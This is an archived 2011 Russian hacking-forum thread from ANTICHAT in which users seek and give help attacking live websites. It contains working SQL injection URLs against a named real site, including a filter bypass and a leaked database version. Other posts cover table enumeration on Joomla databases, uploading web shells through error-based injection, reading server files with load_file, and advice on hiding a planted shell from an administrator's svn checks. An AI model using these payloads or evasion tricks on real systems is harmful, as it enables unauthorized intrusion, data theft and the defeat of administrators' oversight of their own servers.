ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
19.09.2011, 10:04
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от попугай
На серве стоит svn и админ почти ежедневно им пользуется. Мои шеллы и изменения на раз палятся командой
svn status
Как скрыться?
пробовал svn add /path/to/shell.php (Вроде добавляет файл в снимок файловой системы)
Все равно status показывает мои изменения.
Не уверен на 100%, но
Сделать отдельную бранчу, в этой бранче сделать коммит шелла. В логах транка не должны светиться сие действия. Для верности в бранче сделать изменения во всех файлах (добавить по одной строке) и коммитить не шелл, а добавить строку выполнения команды.
|
|
|
19.09.2011, 17:56
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
собственно вопрос как узнать префикс таблиц в joomla? попалась инъекция mysql4 дефолтный jos не катит...
|
|
|
|
19.09.2011, 18:35
|
|
Участник форума
Регистрация: 07.07.2008
Сообщений: 161
Провел на форуме:
1027635
Репутация:
234
|
|
Что можно сделать если есть вот такая sql injection:
Код:
http://mirplombir.ru/index.php?searchstring=1\\%27%29%29or%28SELECT%28COUNT%28*%29%29FR%20%20OM%28%28SELECT%281%29%29UNION%28SELECT%282%29%29UNION%28SELECT%283%29%29%29x/**/GROUP/**/BY/**/MID%28VERSION%28%29,FLOOR%28RAND%280%29*2%29,64%29%29%23%20UNION%20SELECT%201%20--%20%20%27
При этом во время моих экспериментов часто перебрасывает на сайт хостера, где написано
Сообщение от None
Запрос небезопасен и был отвергнут.
|
|
|
|
19.09.2011, 19:32
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от jawbreaker
Что можно сделать если есть вот такая sql injection:
Код:
http://mirplombir.ru/index.php?searchstring=1\\%27%29%29or%28SELECT%28COUNT%28*%29%29FR%20%20OM%28%28SELECT%281%29%29UNION%28SELECT%282%29%29UNION%28SELECT%283%29%29%29x/**/GROUP/**/BY/**/MID%28VERSION%28%29,FLOOR%28RAND%280%29*2%29,64%29%29%23%20UNION%20SELECT%201%20--%20%20%27
При этом во время моих экспериментов часто перебрасывает на сайт хостера, где написано Попробовать здесь.
Сообщение от None
http://mirplombir.ru/index.php?news=2'and(select*from(select(name_const (version(),1)),name_const(version(),1))a)and'
Duplicate column name '5.1.50-lk-log'
|
|
|
|
20.09.2011, 01:22
|
|
Новичок
Регистрация: 13.06.2011
Сообщений: 27
Провел на форуме:
10040
Репутация:
7
|
|
Сообщение от er9j6@
Попробовать здесь.
Код:
http://mirplombir.ru/index.php?news=2'and(select*from(select(name_const (version(),1)),name_const(version(),1))a)and'
Duplicate column name '5.1.50-lk-log' name_const здесь не надо использовать в связи с ее особенностями на разных версиях маскула. Кроме констант ты ничего не выведешь, да и вопрос состоял в другом, а именно
Сообщение от jawbreaker
При этом во время моих экспериментов часто перебрасывает на сайт хостера, где написано
Код:
Запрос небезопасен и был отвергнут.
Это фильтрация на последовательность union select from
Один из вариантов обхода
Код:
http://mirplombir.ru/index.php?news=2'and(0)union%0Aselect+version(),2,3+from+information_schema.tables--+
|
|
|
|
20.09.2011, 08:03
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Удачно подобрал нужную таблицу в PostgreSQL, но вывести колонки не получается.
Запрос: http://www.site.com/index.php?id=246+union+select+column_name+from+inf ormation_schema.columns+where+table_name=chr(106)| |chr(111)||chr(115)||chr(95)||chr(117)||chr(115)|| chr(101)||chr((114)||chr(115) --
Вывод: FUNCTION modx1.chr does not exist
Судя по ошибке двиг "modx" и в нём нету по-умолчанию "char";
Запрос: http://www.site.com/index.php?id=246+union+select+column_name+from+INF ORMATION_SCHEMA.columns+where+TABLE_name=jos_users--
Вывод: Unknown column 'jos_users' in 'where clause'
В чём моя ошибка? Как вывести колонки из таблицы jos_users ?
|
|
|
|
20.09.2011, 09:07
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
Провел на форуме:
124363
Репутация:
11
|
|
попробуй jos_users занести в кавычки или в hex переведи
|
|
|
|
20.09.2011, 12:25
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131
Репутация:
74
|
|
Привет, есть вопрос по заливке шелла через error based sqli.
Допустим есть запрос вида:
Код:
index.php?id=1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+USER()),floor(rand(0)*2)))+--+
Код:
Duplicate entry 'root@localhost1' for key 1
Так вывожу имена таблиц:
Код:
Код:
?id=1+or+(select+count(*)+from+(select+1+ union+select+2+union+select+3)x+group+by+concat((SELECT+TABLE_NAME+FROM+information_schema.tables+LIMIT+0,1),floor(rand(0)*2)))+--+
Путь известен.
Как действовать дальше?
Да чуть не забыл, соль в том, что mq=on. |
|
|
|
20.09.2011, 13:01
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от fl00der
Привет, есть вопрос по заливке шелла через error based sqli.
Допустим есть запрос вида:
Код:
index.php?id=1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+USER()),floor(rand(0)*2)))+--+
Код:
Duplicate entry 'root@localhost1' for key 1
Так вывожу имена таблиц:
Код:
Код:
?id=1+or+(select+count(*)+from+(select+1+ union+select+2+union+select+3)x+group+by+concat((SELECT+TABLE_NAME+FROM+information_schema.tables+LIMIT+0,1),floor(rand(0)*2)))+--+
Путь известен.
Как действовать дальше?
Да чуть не забыл, соль в том, что mq=on. Я на 100% не уверен, если mq=on, залить шелл не удастся
|
|
|
|
20.09.2011, 13:11
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944
Репутация:
37
|
|
Сообщение от er9j6@
Я на 100% не уверен, если mq=on, залить шелл не удастся
Все правильно, с mq не зальешь шелл через скулю, но ты можешь читать файлы через load_file(HEX)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
